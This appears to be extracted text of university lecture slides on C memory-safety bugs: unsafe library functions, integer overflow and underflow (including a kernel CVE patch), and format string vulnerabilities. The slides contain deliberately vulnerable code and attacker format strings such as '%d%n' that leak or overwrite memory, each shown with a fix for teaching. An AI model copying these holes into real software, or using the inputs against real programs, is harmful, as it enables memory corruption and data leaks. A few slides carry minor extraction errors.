Solution: Specify the Size

68

void safer(void) {

char name[20];

...

fgets(name, sizeof(name), stdin);

...

}

sizeof returns the size of the variable (does not work for pointers)

Computer Science 161

Fall 2022

69 of 94

Vulnerable C Library Functions

  • gets - Read a string from stdin
    • Use fgets instead
  • strcpy - Copy a string
    • Use strncpy (more compatible, less safe) or strlcpy (less compatible, more safe) instead
  • strlen - Get the length of a string
    • Use strnlen instead (or memchr if you really need compatible code)
  • … and more (look up C functions before you use them!)
    • man pages are your friend!

69

Computer Science 161

Fall 2022

70 of 94

Short Break?

70

Computer Science 161

Fall 2022

71 of 94

Integer Memory Safety Vulnerabilities

71

Textbook Chapter 3.4

Computer Science 161

Fall 2022

72 of 94

Signed/Unsigned Vulnerabilities

72

void func(int len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

void *memcpy(void *dest, const void *src, size_t n);

int is a signed type, but size_t is an unsigned type. What happens if len == -1?

This is a signed comparison, so len > 64 will be false, but casting -1 to an unsigned type yields 0xffffffff: another buffer overflow!

Is this safe?

Computer Science 161

Fall 2022

73 of 94

Signed/Unsigned Vulnerabilities

73

void safe(size_t len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

Now this is an unsigned comparison, and no casting is necessary!

Computer Science 161

Fall 2022

74 of 94

Integer Overflow Vulnerabilities

74

void func(size_t len, char *data) {

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

Is this safe?

What happens if len == 0xffffffff?

len + 2 == 1, enabling a heap overflow!

Computer Science 161

Fall 2022

75 of 94

Integer Overflow Vulnerabilities

75

void safe(size_t len, char *data) {� if (len > SIZE_MAX - 2)

return;

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

It’s clunky, but you need to check bounds whenever you add to integers!

Computer Science 161

Fall 2022

76 of 94

Integer Overflows in the Wild

76

WJXT Jacksonville

Broward Vote-Counting Blunder Changes Amendment Result

November 4, 2004

The Broward County Elections Department has egg on its face today after a computer glitch misreported a key amendment race, according to WPLG-TV in Miami.

Amendment 4, which would allow Miami-Dade and Broward counties to hold a future election to decide if slot machines should be allowed at racetracks, was thought to be tied. But now that a computer glitch for machines counting absentee ballots has been exposed, it turns out the amendment passed.

"The software is not geared to count more than 32,000 votes in a precinct. So what happens when it gets to 32,000 is the software starts counting backward," said Broward County Mayor Ilene Lieberman.

That means that Amendment 4 passed in Broward County by more than 240,000 votes rather than the 166,000-vote margin reported Wednesday night. That increase changes the overall statewide results in what had been a neck-and-neck race, one for which recounts had been going on today. But with news of Broward's error, it's clear amendment 4 passed.

Computer Science 161

Fall 2022

77 of 94

Integer Overflows in the Wild

  • 32,000 votes is very close to 32,768, or 215 (the article probably rounded)
    • Recall: The maximum value of a signed, 16-bit integer is 215 - 1
    • This means that an integer overflow would cause -32,768 votes to be counted!
  • Takeaway: Check the limits of data types used, and choose the right data type for the job
    • If writing software, consider the largest possible use case.
      • 32 bits might be enough for Broward County but isn’t enough for everyone on Earth!
      • 64 bits, however, would be plenty.

77

Computer Science 161

Fall 2022

78 of 94

Another Integer Overflow in the Wild

78

9 to 5 Linux

New Linux Kernel Vulnerability Patched in All Supported Ubuntu Systems, Update Now

Marius Nestor

January 19, 2022

Discovered by William Liu and Jamie Hill-Daniel, the new security flaw (CVE-2022-0185) is an integer underflow vulnerability found in Linux kernel’s file system context functionality, which could allow an attacker to crash the system or run programs as an administrator.

Computer Science 161

Fall 2022

79 of 94

How Does This Vulnerability Work?

  • The entire kernel (operating system) patch:� if (len > PAGE_SIZE - 2 - size)�+ if (size + len + 2 > PAGE_SIZE)� return invalf(fc, "VFS: Legacy: Cumulative options too large)
  • Why is this a problem?
    • PAGE_SIZE and size are unsigned
    • If size is larger than PAGE_SIZE
    • …then PAGE_SIZE - 2 - size will trigger a negative overflow to 0xFFFFFFFF
  • Result: An attacker can bypass the length check and write data into the kernel

79

Computer Science 161

Fall 2022

80 of 94

Format String Vulnerabilities

80

Textbook Chapter 3.3

Computer Science 161

Fall 2022

81 of 94

Review: printf behavior

  • Recall: printf takes in an variable number of arguments
    • How does it know how many arguments that it received?
    • It infers it from the first argument: the format string!
    • Example: printf("One %s costs %d", fruit, price)
    • What happens if the arguments are mismatched?

81

Computer Science 161

Fall 2022

82 of 94

Review: printf behavior

82

void func(void) {

int secret = 42;

printf("%d\n", 123);

}

printf assumes that there is 1 more argument because there is one format sequence and will look 4 bytes up the stack for the argument

What if there is no argument?

...

...

...

...

RIP of func

SFP of func

secret = 42

123 (arg to printf)

&"%d\n"(arg to printf)

RIP of printf

SFP of printf

[printf frame]

'%'

'd'

'\n'

'\0'

arg0

arg1

Computer Science 161

Fall 2022

83 of 94

Review: printf behavior

83

void func(void) {

int secret = 42;

printf("%d\n");

}

Because the format string contains the %d, it will still look 4 bytes up and print the value of secret!

...

...

...

...

RIP of func

SFP of func

secret = 42

&"%d\n"(arg to printf)

RIP of printf

SFP of printf

[printf frame]

'%'

'd'

'\n'

'\0'

arg0

arg1

Computer Science 161

Fall 2022

84 of 94

Format String Vulnerabilities

84

char buf[64];

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

What is the issue here?

Computer Science 161

Fall 2022

85 of 94

Format String Vulnerabilities

  • Now, the attacker can specify any format string they want:
    • printf("100% done!")
      • Prints 4 bytes on the stack, 8 bytes above the RIP of printf
    • printf("100% stopped.")
      • Print the bytes pointed to by the address located 8 bytes above the RIP of printf, until the first NULL byte
    • printf("%x %x %x %x ...")
      • Print a series of values on the stack in hex

85

char buf[64];

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Computer Science 161

Fall 2022

86 of 94

Format String Vulnerability Walkthrough

86

Note that strings are passed by reference in C, so the argument to printf is actually a pointer to buf, which is in static memory.

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

buf

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

87 of 94

Format String Vulnerability Walkthrough

87

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

We’re calling printf("%d%s"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

's'

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

88 of 94

Format String Vulnerability Walkthrough

88

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

's'

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

89 of 94

Format String Vulnerability Walkthrough

89

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42pancake

The second format specifier %s says to treat the next argument (arg2) as an string and print it out.

%s will dereference the pointer at arg2 and print until it sees a null byte ('\0')

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

's'

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

90 of 94

Format String Vulnerabilities

  • They can also write values using the %n specifier
    • %n treats the next argument as a pointer and writes the number of bytes printed so far to that address (usually used to calculate output spacing)
      • printf("item %d:%n", 3, &val) stores 7 in val
      • printf("item %d:%n", 987, &val) stores 9 in val
    • printf("000%n")
      • Writes the value 3 to the integer pointed to by address located 8 bytes above the RIP of printf

90

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Computer Science 161

Fall 2022

91 of 94

Format String Vulnerability Walkthrough

91

Input: %d%n

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

We’re calling printf("%d%n"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

'n'

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

92 of 94

Format String Vulnerability Walkthrough

92

Input: %d%n

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

'n'

'a'

'k'

'e'

'\0'

'p'

'a'

'n'

'c'

Computer Science 161

Fall 2022

93 of 94

Format String Vulnerability Walkthrough

93

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The second format specifier %n says to treat the next argument (arg2) as a pointer, and write the number of bytes printed so far to the address at arg2.

We've printed 2 bytes so far, so the number 2 gets written to secret_string.

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

arg0

arg1

arg2

'\0'

'%'

'd'

'%'

'n'

'a'

'k'

'e'

'\0'

0x02

0x00

0x00

0x00

Computer Science 161

Fall 2022

94 of 94

Format String Vulnerabilities: Defense

94

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf("%s", buf);

}

Never use untrusted input in the first argument to printf.

Now the attacker can't make the number of arguments mismatched!

Computer Science 161

Fall 2022